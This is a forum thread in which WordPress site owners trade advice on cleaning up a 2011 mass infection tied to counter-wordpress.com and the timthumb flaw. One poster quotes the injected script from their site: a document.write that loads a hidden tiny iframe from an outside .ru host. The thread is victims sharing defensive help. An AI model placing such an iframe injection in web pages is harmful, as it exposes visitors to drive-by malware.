Google issuing warnings about WP site: "content from counter-wordpress.com"?

TO URBAN WHO LOST EVERYTHING & EVERYONE ELSE,DON’T WORRY,CALM DOWN.

Before helping you out, I have one question:

Did you access the phpmyadmin via your cpanel, if not, don’t you worry.

If anyone has the same problem as URBAN, my email is [email protected], i will stay online, cause this must be handled one by one, i will be happy to help anyone here, cause i know how it feels, when a blog is gone like dust in the wind.

What a morning, woke up to see this warning on the site.

Checked wp-config was fine, scanned the site, got this file infected

https://*******.com/wp-includes/js/l10n.js?ver=20101110

replaced the file with wordpress latest version, reinstall wordpress through dashboard..

moved wp-config to one level up for security reasons…

rescanned, everything comes good…

Clear the browser history to check if I still get this message, and it doesn’t….changed all the passwords also..

Thanks for all the help on this thread, otherwise it would have been a mess…

Big thanks to nihadnagi – he helped me restore my blog and clear the malware from my site. I’m very grateful for all of your help and patience with me. ??

I made a video on how to get rid of the malware content and the warning on your wordpress site here:

I got the malware on my site because I installed a plugin that was a cashing plugin that was suppose to help my site run faster, but instead I got malware!

Hope this helps everyone.

We also posted more details here:

https://blog.sucuri.net/2011/08/mass-infection-of-wordpress-sites-counter-wordpress-com.html

Hope it helps people to understand what is going on. Also, if you cleaned the .js file and is still seeing a warning, try o clear your browser cache.

thanks,

I have 4 sites blacklisted from this, but when I ran the sucuri sitecheck, it came back clean. I changed the two javascript files nonetheless (for not only the four sites, but the other sites on the same host).

My host did a virus scan and came up with a few of these types of results:
{HEX}gzbase64.inject.unclassed.14 : ./site1.com/wp-content/plugins/adsense-now/adsense-now.php
{HEX}base64.inject.unclassed.6 : ./site2.com/wp-content/plugins/wpematico/app/options-settings.php
{HEX}php.nested.base64.499 :

So, for sure my Adsense Now plugin is part of some kind of issue. Not sure if the scan is even related to this counter-wordpress issue, though.

I have been troubleshooting several sites that have been hit with this attack. I notice 2 major hacks going around over the past few days. Once you have updated your theme and removed timthumb (or updated it), here is some info on how to help clean up your site.

If you have already been hit, then the first thing you should do is open wp-config.php and look for any suspicious code. Generally, you should delete everything after:

require_once(ABSPATH . ‘wp-settings.php’);

Check for suspicious whitespace as well. In one of the attacks, hundreds of lines of white space is been added to try and mask the malicious code.

Next open index.php and delete everything between:

require(‘./wp-blog-header.php’);

…

?>

After that I would re-install WordPress from within the WordPress Dashboard via the Updates tab to clean up the infected .js files. When you have done that I would probably run Clam-AV if you have it installed, as well as https://sitecheck.sucuri.net/scanner/. Clam will help pick up any suspicious code that has been obfuscated in base64.

Finally, be sure to change your MySQL passwords and wp-admin passwords just in case. It’s also worth mentioning that the timthumb vulnerability affects inactive themes as well. This script is very popular throughout the theme community. I would delete all of your inactive themes just to make sure you don’t have any timthumb.php files laying around.

Okay – reading through this thread means that I am not the only one who got hacked within the last 48 hours. My problem? I have three sites ?? …Don’t know how I can find the time to fix them all.

Thank you all for your help though; I might get my sites backup and running.

I have my sites on Google’s Webmaster Tool and they have given me the information where to find the hack. It is the same hack ‘darkpollo’ described. Now off to cleaning my blog, hopefully ??

I just found this forum post after my own blog was hacked with the same exploit the last few days.

I discovered that my wp-config file was several thousand lines long (instead of the 90 or so lines it should be), and Google Chrome was blocking access to my site as well.

Thankfully, I use a premium backup plugin called BackupBuddy. I highly recommend using it.

Thankfully I was able to restore a full, clean back-up with it, and change MySQL database details in the process.

But that still doesn’t fix the exploit. I had no idea about this timthumb.php thing – never heard of it before.

So I did some digging and found the following website that lists ALL the WordPress themes and plugins that use timthumb.php in some way. Thought this might be very useful for others on here who don’t think they have timthumb either:

https://www.websitedefender.com/web-security/timthumb-vulnerability-wordpress-plugins-themes/

hi,

google webmaster tool find some malware problem on my site in the form of this script
<script type=”text/javascript”>
document.write(‘<iframe src=”https://rycgoka.ru/count1.php&#8221; name=”Twitter” scrolling=”auto” frameborder=”no” align=”center” height=”2″ width=”2″></iframe>’);
</script>

can anyone tall me how can remove this script in my site
this script appear on my home page in head section
and i only use two plugin one for google webmaster tool and other for google analytic tool and i checked these plugin for this script
please give me some solution

I got the same problem, I had been resolved this issue with in a couple of days. I wrote my experience here

https://www.theprogrammersguide.com/overcoming-malware-backlisting-by-google/

I hope the information helps.

In my case it was problem with htacess file in my webserver